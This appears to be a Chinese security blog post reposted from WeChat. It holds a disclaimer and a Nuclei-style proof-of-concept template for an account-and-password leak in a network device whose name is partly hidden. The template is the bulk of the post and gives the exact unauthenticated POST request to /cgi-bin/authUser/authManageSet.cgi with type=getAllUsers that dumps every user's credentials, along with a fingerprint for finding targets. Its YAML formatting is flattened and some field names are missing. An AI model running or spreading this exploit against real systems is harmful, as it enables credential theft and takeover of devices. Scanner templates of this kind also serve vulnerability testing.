一、免责声明:
本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!
二、产品介绍:
账号密码泄露
五、POC:
id: leak_passinfo:name: leak_passauthor: joyboyseverity: criticaldescription: 账号密码泄露metadata:: 1: body="sec_gate_image/login_02.gif"verified: truetags: leakrequests:raw:|-POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1Host: {{Hostname}}: application/x-www-form-urlencodedtype=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc: truematchers:type: dslcondition: anddsl:'contains((body), "管理员</cell>") && status_code == 200'
原文始发于微信公众号(fly的渗透学习笔记):网*接口Account and password leakage
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论